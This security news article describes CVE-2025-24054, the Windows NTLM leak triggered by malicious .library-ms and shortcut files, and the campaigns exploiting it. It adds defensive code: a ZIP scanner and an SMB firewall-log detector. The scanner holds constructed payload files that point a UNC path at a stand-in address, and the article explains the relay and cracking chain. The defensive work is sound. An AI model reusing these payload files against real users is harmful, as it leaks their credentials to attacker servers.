17 Apr

CVE-2025-24054 is an NTLM hash disclosure vulnerability triggered through spoofed file locations.
The flaw, which concerns NTLM (New Technology LAN Manager) authentication, has become a significant threat: it lets attackers capture a user's NTLM authentication response and use it to escalate privileges or move laterally within compromised networks.
NTLM is a suite of challenge-response authentication protocols developed by Microsoft to verify user identities on Windows networks. While NTLMv2 offers improved security over earlier versions, weaknesses remain, especially where an attacker can coerce a Windows host into authenticating to a server the attacker controls.
CVE-2025-24054 specifically involves external control of file names or paths in Windows (CWE-73): a crafted file name or path causes Windows to issue an SMB (Server Message Block) authentication request that leaks the user's NTLMv2-SSP response (the Net-NTLMv2 challenge-response, commonly referred to as an NTLM hash) during routine file operations.
Microsoft released a security patch for CVE-2025-24054 on March 11, 2025. The flaw is triggered when a user extracts a ZIP archive containing a malicious .library-ms file, which causes Windows Explorer to initiate an SMB authentication request to a remote server named in the file.
That request carries the user's NTLMv2-SSP response, which attackers capture for further malicious activity. Notably, the exploit requires minimal user interaction, such as right-clicking, dragging, dropping, or simply navigating to a folder containing the malicious file.
Active Exploitation of Vulnerability in the Wild

Despite the patch, threat actors began exploiting CVE-2025-24054 within days of its release. Check Point Research first observed malicious campaigns leveraging this flaw around March 20–21, 2025.
These campaigns targeted government and private institutions, primarily in Poland and Romania, using spear-phishing emails containing ZIP archives and embedded malicious files.

Check Point told Cyber Security News that once victims downloaded and interacted with these files, such as unzipping or clicking them, the exploit was triggered, leading to the leak of NTLM hashes.
The malicious archives contained .library-ms, .url, .website, and .lnk files, all designed to initiate SMB connections to attacker-controlled servers. Those connections exposed NTLMv2-SSP responses, which attackers can relay to other systems that accept NTLM authentication or crack offline to recover the password, and then use the result to escalate privileges within the network. (The captured value is a challenge-response rather than the stored NT hash, so it cannot be replayed directly as in a pass-the-hash attack.)
The campaigns appeared highly targeted, with the primary goal of harvesting NTLM hashes for subsequent use in lateral movement or privilege escalation.
The coerced SMB connections, and with them the authentication responses, went to attacker-controlled SMB servers hosted in various countries, including Russia, Bulgaria, the Netherlands, Australia, and Turkey. The tradecraft points to capable threat actors, believed to be linked to state-sponsored groups.
One notable campaign involved distributing malicious files via email links from Dropbox, which, when interacted with, exploited the vulnerability to leak hashes.
The campaign’s focus on government agencies in Poland and Romania highlights the geopolitical significance and potential for espionage or sabotage.

The exploit hinges on how Windows Explorer handles the contents of such an archive. A .library-ms file is an XML description of a library whose locations Explorer enumerates as soon as the file is displayed; when one of those locations is a UNC path on a remote server, Windows opens an SMB connection to it and authenticates automatically with the current user's credentials. The .url, .website and .lnk files seen in the campaigns achieve the same effect through a target or icon path that points at a remote share.
The NTLMv2-SSP response therefore leaks without requiring extensive user interaction, which makes the attack particularly insidious. Attackers can relay that response to internal services that accept NTLM, or crack it offline to recover the password, and so authenticate as the victim, often with high privileges, enabling lateral movement and network compromise.
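To make the trigger concrete, here is an added example (not code from the article, from Check Point or from Microsoft) that inspects a ZIP archive for .library-ms, .url and .website members whose target is a UNC path or file:// URL, which is exactly what makes Explorer open an SMB session. The sample archive, its member names and the 203.0.113.5 address are constructed for the example; a .lnk member is only flagged for manual review because its binary format is not parsed here.

```python
import io
import re
import xml.etree.ElementTree as ET
import zipfile

SHORTCUT_EXTS = (".library-ms", ".url", ".website", ".lnk")
# UNC paths (\\host\share) and file:// URLs make Explorer open an SMB session to the host.
# http(s) targets can also be coerced to WebDAV, but web URLs are normal in .url files,
# so this example limits itself to targets that reach SMB directly.
REMOTE_RE = re.compile(r"^\s*(\\\\[^\\\s]+\\|file://)", re.IGNORECASE)


def remote_targets_in_library_ms(data: bytes) -> list[str]:
    """Return each <url> location in a .library-ms that points off the local machine.
    Explorer resolves a library's simpleLocation/url as soon as the file is displayed."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return []
    hits = []
    for el in root.iter():
        # the tag may or may not carry the library XML namespace; match on the local name
        if el.tag.rsplit("}", 1)[-1] == "url" and el.text and REMOTE_RE.match(el.text):
            hits.append(el.text.strip())
    return hits


def remote_targets_in_url_file(data: bytes) -> list[str]:
    """Return remote URL/IconFile/WorkingDirectory values from a .url or .website shortcut."""
    hits = []
    for line in data.decode("utf-8", errors="replace").splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip().lower() in ("url", "iconfile", "workingdirectory") \
                and REMOTE_RE.match(value):
            hits.append(value.strip())
    return hits


def scan_zip(zip_bytes: bytes) -> list[tuple[str, str]]:
    """Return (member name, remote target) pairs that justify quarantining the archive."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            ext = "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""
            if info.is_dir() or ext not in SHORTCUT_EXTS:
                continue
            data = zf.read(name)
            if ext == ".library-ms":
                targets = remote_targets_in_library_ms(data)
            elif ext in (".url", ".website"):
                targets = remote_targets_in_url_file(data)
            else:
                # .lnk is binary (MS-SHLLINK); flag it for manual review rather than parse it here
                targets = ["<binary .lnk, inspect manually>"]
            findings.extend((name, t) for t in targets)
    return findings


# Constructed samples (not real campaign files): a library pointing at a documentation-range
# address, a benign library pointing at a local folder, and a .url whose icon is remote.
MALICIOUS_LIBRARY_MS = rb"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation><url>\\203.0.113.5\share</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

BENIGN_LIBRARY_MS = rb"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList><searchConnectorDescription>
    <simpleLocation><url>C:\Users\Public\Documents</url></simpleLocation>
  </searchConnectorDescription></searchConnectorDescriptionList>
</libraryDescription>
"""

ICON_URL_FILE = rb"""[InternetShortcut]
URL=https://example.com/
IconFile=\\203.0.113.5\icons\x.ico
IconIndex=0
"""


def build_sample_zip() -> bytes:
    """Assemble the constructed samples into an in-memory archive."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "nothing to see here")
        zf.writestr("invoice.library-ms", MALICIOUS_LIBRARY_MS)
        zf.writestr("Documents.library-ms", BENIGN_LIBRARY_MS)
        zf.writestr("link.url", ICON_URL_FILE)
    return buf.getvalue()


if __name__ == "__main__":
    for member, target in scan_zip(build_sample_zip()):
        print(f"{member}: {target}")
```

Run it and the two remote targets are reported while the benign library and the plain text file are ignored. A mail gateway or endpoint control that runs this kind of check on inbound archives stops the file before Explorer ever renders it, which matters because, as described above, rendering alone is enough to trigger the authentication.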
Mitigations

Microsoft’s prompt patching of CVE-2025-24054 was a crucial step; however, the rapid exploitation indicates that organizations must act swiftly to mitigate risks. Key recommendations include:
Applying patches immediately: Ensure all affected systems have the March 11, 2025 update for CVE-2025-24054 installed.
Enhancing network defenses: Block outbound SMB (TCP 445) at the perimeter so a coerced authentication never reaches an Internet-hosted server; require SMB signing and Extended Protection for Authentication on internal services so that captured responses cannot be relayed; and monitor SMB traffic for connections to unexpected hosts.
Restricting NTLM: Where feasible, use the Group Policy setting "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" to audit or deny NTLM authentication to remote servers.
User awareness: Educate users about the risks of opening untrusted archives or clicking on suspicious files.
Network segmentation: Limit SMB traffic between segments to reduce the attack surface.
Regular security audits: Conduct vulnerability assessments and monitor for signs of compromise.

The exploitation of CVE-2025-24054 exemplifies how attackers leverage seemingly benign file operations to leak sensitive authentication material, facilitating deeper infiltration into target networks.
The swift transition from patch release to active exploitation underscores the importance of rapid response and proactive security measures.
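The recommendation to monitor SMB traffic can be applied directly to Windows Firewall logging. The following added example (not from the article or from any vendor) parses a constructed excerpt in the pfirewall.log field order and reports outbound connections to TCP 445/139 whose destination lies outside a set of assumed internal ranges; the log lines, hosts and the internal-range list are illustrative assumptions, and a real deployment would substitute the organisation's own address plan.

```python
import ipaddress
from collections import Counter

SMB_PORTS = {445, 139}
# Assumed internal ranges for the example; substitute the organisation's real address plan.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]

# Column order of the W3C-style pfirewall.log written by Windows Firewall logging.
FIELDS = ("date", "time", "action", "protocol", "src", "dst", "sport", "dport", "size",
          "tcpflags", "tcpsyn", "tcpack", "tcpwin", "icmptype", "icmpcode", "info", "path")


def is_external(ip: str) -> bool:
    """True when the address is outside every assumed internal range."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def parse_pfirewall(text: str) -> list[dict]:
    """Parse pfirewall.log lines into dicts; header/comment lines (#...) are skipped."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) < len(FIELDS):
            continue
        rec = dict(zip(FIELDS, parts))
        # ports are written as '-' on ICMP lines
        rec["sport"] = int(rec["sport"]) if rec["sport"].isdigit() else None
        rec["dport"] = int(rec["dport"]) if rec["dport"].isdigit() else None
        records.append(rec)
    return records


def find_outbound_smb(records: list[dict]) -> list[dict]:
    """Outbound (SEND) TCP to 445/139 on a non-internal destination, whether ALLOW or DROP:
    a DROP still shows that something on the host tried to reach an external SMB server."""
    return [r for r in records
            if r["protocol"] == "TCP" and r["path"] == "SEND"
            and r["dport"] in SMB_PORTS and is_external(r["dst"])]


def summarize(events: list[dict]) -> dict[tuple[str, str], int]:
    """Count attempts per (source host, external SMB server) pair for alerting."""
    return dict(Counter((e["src"], e["dst"]) for e in events))


# Constructed log excerpt in pfirewall.log field order; addresses are documentation ranges.
SAMPLE_LOG = """\
#Version: 1.5
#Software: Microsoft Windows Firewall
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2025-03-21 10:15:32 ALLOW TCP 10.0.0.15 10.0.0.2 49832 445 0 - 0 0 0 - - - SEND
2025-03-21 10:15:40 ALLOW TCP 10.0.0.15 203.0.113.5 49840 445 0 - 0 0 0 - - - SEND
2025-03-21 10:15:41 ALLOW TCP 10.0.0.15 203.0.113.5 49841 445 0 - 0 0 0 - - - SEND
2025-03-21 10:16:02 ALLOW TCP 10.0.0.22 198.51.100.9 50110 443 0 - 0 0 0 - - - SEND
2025-03-21 10:16:30 DROP TCP 10.0.0.31 198.51.100.77 50301 445 0 - 0 0 0 - - - SEND
2025-03-21 10:17:00 ALLOW TCP 203.0.113.5 10.0.0.15 445 49840 0 - 0 0 0 - - - RECEIVE
"""

if __name__ == "__main__":
    events = find_outbound_smb(parse_pfirewall(SAMPLE_LOG))
    for (src, dst), n in summarize(events).items():
        print(f"{src} -> {dst}: {n} outbound SMB attempt(s)")
```

On the sample, the internal file-server connection and the HTTPS session are ignored, the two allowed connections from 10.0.0.15 to 203.0.113.5 are reported together, and the dropped attempt from 10.0.0.31 is reported as well: a blocked connection is still evidence that a malicious shortcut was rendered on that host and should drive the same triage.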

